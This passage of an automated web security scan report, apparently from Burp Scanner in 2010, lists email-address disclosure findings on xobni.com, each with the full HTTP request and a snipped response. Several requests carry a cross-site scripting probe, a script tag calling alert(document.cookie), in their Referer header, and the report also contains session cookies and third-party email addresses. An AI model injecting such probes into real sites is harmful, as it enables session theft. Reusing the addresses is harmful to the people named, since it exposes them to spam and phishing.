...[SNIP]...
<td><a href="/opensource/">Parent Directory</a>
...[SNIP]...

14. Email addresses disclosed
There are 31 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


14.1. http://www.xobni.com/about/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/contact

Issue detail

The following email address was disclosed in the response:

Request

GET /about/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<a href="mailto:billing@xobni.com">
...[SNIP]...

14.2. http://www.xobni.com/autosuggest-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /autosuggest-outlook

Issue detail

The following email addresses were disclosed in the response:

Request

GET /autosuggest-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Rank Powere
...[SNIP]...
<div style="top: 38px; left: 158px;">jon.doe@cisco.com</div>
                       <div style="top: 58px; left: 158px; color: #999999;">wturlock2000@cisco.com</div>
                       <div style="top: 78px; left: 158px; color: #999999;">lraines-abc@cisco.com</div>
                       <div style="top: 98px; left: 158px; color: #999999;">fiona.hurley@cisco.com</div>
...[SNIP]...
<p>Jon Doe (with the email address jon.doe@cisco.com) was CC'd on an email your boss sent you. You need to quickly write Jon an email, but let's assume that all you remember is that he worked at Cisco. You've even forgotten his name.</p>
...[SNIP]...

14.3. http://www.xobni.com/blackberry

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /blackberry

Issue detail

The following email address was disclosed in the response:

Request

GET /blackberry HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15880

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni für BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.4. http://www.xobni.com/enterprise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.5. http://www.xobni.com/enterprise/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.6. http://www.xobni.com/enterprise/case_studies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/case_studies

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/case_studies HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11380

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.7. http://www.xobni.com/enterprise/mobile_professionals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/mobile_professionals

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/mobile_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.8. http://www.xobni.com/enterprise/sales_professionals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sales_professionals

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/sales_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.9. http://www.xobni.com/enterprise/salesforce_extension

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/salesforce_extension

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/salesforce_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.10. http://www.xobni.com/enterprise/sharepoint_extension

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sharepoint_extension

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/sharepoint_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.11. http://www.xobni.com/enterprise/sign_up

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sign_up

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprise/sign_up HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15868

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.12. http://www.xobni.com/enterprise/solutions_providers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/solutions_providers

Issue detail

The following email addresses were disclosed in the response:

Request

GET /enterprise/solutions_providers HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...
<a href="mailto:christine.purwin@rimoc.com" target="_blank">christine.purwin@rimoc.com</a> / <a href="mailto:xobni@rimoc.com" target="_blank">xobni@rimoc.com</a>
...[SNIP]...

14.13. http://www.xobni.com/errors/403.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/403.php

Issue detail

The following email address was disclosed in the response:

Request

GET /errors/403.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Error 403 Forbidd
...[SNIP]...
<a href="mailto:webmaster@xobni.com">
...[SNIP]...

14.14. http://www.xobni.com/errors/general.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/general.php

Issue detail

The following email address was disclosed in the response:

Request

GET /errors/general.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni.com: Error<
...[SNIP]...
<a href="mailto:webmaster@xobni.com">
...[SNIP]...

14.15. http://www.xobni.com/icons/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /icons/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /icons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:17 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 69404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /icons</title>
</head>
<body>
<h1>Index of /icons</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"
...[SNIP]...
have been
included in the NCSA httpd and Apache server distributions in the
past. They are in the public domain and may be freely included in any
application. The originals were done by Kevin Hughes (kevinh@kevcom.com).
Andy Polyakov tuned the icon colors and added few new images.</p>
...[SNIP]...
<p>Almost all of these icons are 20x22 pixels in size. There are
alternative icons in the "small" directory that are 16x16 in size,
provided by Mike Brown (mike@hyperreal.org).</p>
...[SNIP]...

14.16. http://www.xobni.com/javascripts/jquery.base64.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /javascripts/jquery.base64.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/jquery.base64.min.js HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 19:57:17 GMT
ETag: "3b099c-12d0e-4964a987e4140"
Accept-Ranges: bytes
Content-Length: 77070
Connection: close
Content-Type: application/javascript

/*
@desc
   Base64 encoder and decoder write by JavaScript. This code was a plugin of
   jQeury, you must load jQuery library first if you want to use this code.
    - After encode, you can decode it w
...[SNIP]...
<hpyer@yahoo.cn>
...[SNIP]...

14.17. http://www.xobni.com/learnmore/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile

Issue detail

The following email address was disclosed in the response:

Request

GET /learnmore/mobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni für BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.18. http://www.xobni.com/learnmore/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/

Issue detail

The following email address was disclosed in the response:

Request

GET /learnmore/mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for BlackBe
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.19. http://www.xobni.com/learnmore/mobile/blackberry/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile/blackberry/

Issue detail

The following email address was disclosed in the response:

Request

GET /learnmore/mobile/blackberry/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni für BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

